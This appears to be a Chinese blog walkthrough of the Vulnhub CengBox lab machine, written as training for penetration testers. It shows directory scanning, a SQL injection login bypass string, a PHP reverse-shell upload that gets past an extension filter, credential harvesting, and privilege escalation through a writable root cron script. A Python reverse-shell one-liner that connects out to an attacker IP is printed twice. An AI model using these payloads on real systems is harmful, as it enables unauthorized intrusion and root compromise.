Vulnhub_CengBox

最新推荐文章于 2025-04-28 15:45:00 发布
最新推荐文章于 2025-04-28 15:45:00 发布
阅读量4.4k 收藏
点赞数
分类专栏: Vulnhub 文章标签: 网络 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_44193247/article/details/127771352
版权

目录

一 环境异常处理

(一)nat设置无法正常获取地址

1 单用户模式进入命令行

2 passwd更改

3 修改网络配置文件

二 环境测试

(一)信息收集

1 端口服务

2 目录扫描

(二)漏洞测试

1 SQL注入万能密码绕过

2 文件上传getshell

(三)提权

1 python脚本提权

三 环境知识点

(一)二级目录发现登录页面

(二)SQL注入万能密码绕过登录

(三)python脚本反弹shell

一 环境异常处理

(一)nat设置无法正常获取地址

1 单用户模式进入命令行

启动时按键e进入配置,将ro更改为rw single init=/bin/bash,更改完成ctrl+x保存重启进入命令行

 

2 passwd更改

为方便配置管理环境,更改环境口令,#passwd可修改口令

3 修改网络配置文件

#vi /etc/network/interfaces修改网络配置,将enp0s3更改为ens33保存重启即可

 

二 环境测试

(一)信息收集

1 端口服务

1.1环境地址发现

1.2全端口快速扫描

1.3存活端口详细扫描

 端口服务探测开放22和80端口

2 目录扫描

2.1 目录爆破

对80端口进行目录爆破,这里需要使用大字典

#dirb http://192.168.4.47 /usr/share/wordlists/dirb/big.txt

 发现masteradmin目录uploads等,其中uploads无权限访问。

 

2.2 子目录爆破

对masteradmin子目录进行扫描探测,重点查找php结尾目录

#dirb http://192.168.4.47/masteradmin/ -X .php,.html

 发现login.php

漏洞测试

1 SQL注入万能密码绕过

访问masteradmin/login.php是一个登录页面,使用万能密码成功登录

 登录成功是一个文件上传界面。

2 文件上传getshell

使用kali自带的php_reverse_shell,上传发现后缀有ceng限制。

 尝试上传.php.ceng文件成功,并解析成功,反弹shell

 

提权

1 python脚本提权

1.1 信息收集

Getshell之后进行信息收集,尝试suid/cron等等提权无果,cengover具有bash,初步思路想办法先su到cengover用户。

 

1.2 mysql登录凭证发现

之前目录扫描发现db.php,在/var/www/html/admin下拿到源码并拿到mysql登录凭证

 

1.3 cengover用户登录凭证发现

登录mysql,收集到cengover用户凭证

 

1.4 pspy to find hidden cronjobs and processes

切换到cengover用户尝试使用常规sudo,suid,cap等等提权均无果,上传pspy监控隐藏进程发现/opt/md5check.py每隔一段时间会以root权限运行,并且cengover可写。

 

1.5 python反弹shell

将python_Reverse Shell 写入脚本,启动监听成功拿到root。

#import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.4.41",9999));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash") 

 

三 环境知识点

 

(一)二级目录发现登录页面

#dirb http://192.168.4.47/masteradmin/ -X .php,.html

(二)SQL注入万能密码绕过登录

11' or '1'='1' #

(三)python脚本反弹shell

#import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.4.41",9999));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash") 

VulnhubCengbox 2靶机详细测试过程(利用不同的方法提权)
Hacker_xingchen的博客
12-25 425
尝试用户名为kevin@ceng-company.vm, 密码为admin。但是访问域名ceng-company.vm,返回页面内容没有发生变化。上传shell.php,发现被保存在assets目录下。可能的用户名: kevin, aaron。发现admin子域名返回状态码为403。域名:ceng-company.vm。目录扫描没有啥收获,是否存在子域名?其他:kevin可能密码比较弱。终于找到了登录的入口。成功得到了shell。
Vulnhub靶机--Cengbox
Tauil的博客
08-13 790
使用该账号密码进行登录,发现是一个文件上传的php文件,上传任意内容,发现只能上传他指定的ceng文件类型。但是该处存在一个解析漏洞,会将ceng文件解析成php文件,所以上传包含以下内容的ceng文件。界面,输入任意内容,打开 burpsuite 进行抓包,将数据包保存下来。文件夹,猜测一个是上传到该处,访问该处的文件,文件正常。应该是一个管理员登录界面,后面可以看到网站主页是。进行php文件细致的探测,输入命令。尝试ssh连接,密码就是之前获得的。,查看后台进程,文件获取地址。获得大致目录,推测目录。.
SQL注入漏洞测试(登录绕过)
weixin_47493074的博客
10-05 1331
SQL注入漏洞测试(登录绕过)
2024版最新148款CTF工具整理大全(附下载安装包)含基础环境、Web 安全、加密解密、密码爆破、文件、隐写、逆向、PWN等全套工具
Libra1313的博客
10-23 1万+
经常会有大学生粉丝朋友私信大白,想通过打CTF比赛镀金,作为进入一线互联网大厂的门票。但是在CTF做题很多的时候都会用到工具,所以在全网苦寻CTF比赛工具安装包!
SQL注入——万能密码
最新发布
hackers110的博客
04-28 1872
优先尝试使用。
SQL注入绕过登陆界面
weixin_73094474的博客
03-06 3226
【代码】SQL注入绕过登陆界面。
【墨者学院】SQL注入漏洞测试(登录绕过)
m0_59151303的博客
07-22 530
一位网站管理员声称自己的管理员密码设置的十分复杂,是不可能被破解的;没想到被渗透测试人员一举拿下,请你也帮他试试看能不能登录管理员账户。二、根据提示是sql注入万能密码,那么我们在登录框尝试' or 1=1#三、点击登陆,发现登陆成功,找到了KEY。2、掌握数据库和网页的注释符;1、了解常用网站万能密码;利用万能密码绕过登录验证。
墨者SQL注入漏洞测试(登录绕过)解题方法
网安小白
07-22 388
一位网站管理员声称自己的管理员密码设置的十分复杂,是不可能被破解的;没想到被渗透测试人员一举拿下,请你也帮他试试看能不能登录管理员账户。2、掌握数据库和网页的注释符;3直接用户名输入admin’#1、了解常用网站万能密码登录绕过一般的语法格式如下。利用万能密码绕过登录验证。2,利用万能密码登录绕过密码随便输入什么都行。
SQL注入网站后台登录绕过(墨者靶场)
FreyZzz的博客
10-13 2757
靶场地址:SQL注入漏洞测试(登录绕过)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养 通过网站URL地址判断不存在id=x等可传参数,此网站不采用GET方式传参。 brup抓包 由此可判断为POST传参 ...
生命在于学习——SQL注入绕过
易水哲的博客
08-17 1万+
SQL注入绕过技术已经是一个老生常淡的内容了
渗透测试-SQL注入手法与绕过手段
Sgirll的博客
06-17 1234
union select 1,group_concat(table_name),3:使用 UNION 操作符,这部分查询语句返回一个包含三列数据的结果集:第一列是数字 1,第二列是目标数据库中所有数据表的名称列表,这里使用了 GROUP_CONCAT 函数进行聚合拼接,第三列是数字 3。该攻击利用了 SQL 注入漏洞,通过修改原有的 SQL 语句,绕过了应用程序的输入校验机制,从而对目标数据库造成了安全风险。id=1:假定这是一个 Web 应用程序的 URL 查询字符串参数,指定了 id 参数的值为 1。
sql注入之(登录绕过
热门推荐
qq_42383069的博客
05-06 2万+
sql注入之(登录绕过) 原理说明: Mysql数据库查询语句: 一般的登录sql语句如下: select name.passwd from users where username=‘name’ and password=‘pwd’; 分析: 如果我们输入的是正确的用户名与密码,肯定就可以登陆进去,错的就不行了。但是这个验证机制可以通过SQL语句来构造一个特殊的“字符串”通过验证。 比如我们...
SQL注入漏洞(绕过篇)
errorr0
06-24 5420
SQL注入绕过手法
万能密码为什么能成功
lmt_2001的博客
03-14 949
那么我们在看这条语句,就相当于只需要满足use的值为空,或者是1=1和pwd等于’123‘。我们理解这条是查询数据库中表名为tb_admin中的use列,并且查询需要满足的条件是use列中值为“11”而且还要pwd列值为“123”的数据信息。通常我们会使用这种方法来验证网页上用户输入的账号和密码,如果是有这条信息的则出现另一个登录成功。万能密码的用户名和密码: admin or 1=1 或者1 or 1=1 or 1=1。但是:如果登录时候我们用了类似or 1=1的输入的话那语句会变了样了。
网络安全|渗透测试入门案例分析,从零基础入门到精通—登录框页面的快速渗透常用检测手段
Jum的博客
06-21 2935
随着平台的多样性,用户需求的不断提高,为了方便用户通过一次性用户身份验证登录多个应用程序和网站,大多数平台都会使用 SSO 系统。在后端机制中,存在一个安全错误配置,它没有检查是否是为特定应用程序生成的 JWT 令牌——相反,它接受任何具有有效签名的 JWT 令牌。可以手动测试例如下面的一些高频弱口令,2.根据网站所使用的第三方组件,寻找特定的弱口令或默认口令进行登录。或者直接BP走一波。在网站后台登录的页面常用的渗透办法今天给大家分享一下,这样更好的让大家在日常维护网站的时候好注意在各个方便进行防御。
burpLab——sql注入学习笔记
2201_75353421的博客
08-27 397
为了加深对sql注入的实战理解,这里我对burp官方的sql注入靶场做了一次全通关解析,针对备忘录清单也重点截取了上来,希望这篇sql注入学习笔记能对你有所帮助。
墨者学院----SQL注入漏洞测试(登录绕过)
weixin_53736204的博客
07-22 201
输入框没有进行特殊字符的限制,通过 ' #可绕过密码输入进入系统。
Web安全SQL各类注入绕过
2401_84281638的博客
04-27 1423
其中concat()函数为连接函数,连接波浪号和查询信息,波浪号常常使用0x7e代替,substr为截取函数,因为报错信息最多32位,或者使用limit分页函数。
Vulnhub篇potato靶机学习笔记及整理
Vulnhub是一个在线平台,为网络安全爱好者提供一系列的“虚拟机”,这些虚拟机通常被称为“靶机”,含有各种安全漏洞,用于教育和测试目的。在渗透测试的学习和实践中,Vulnhub成为了一个非常受欢迎的资源。本知识点...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值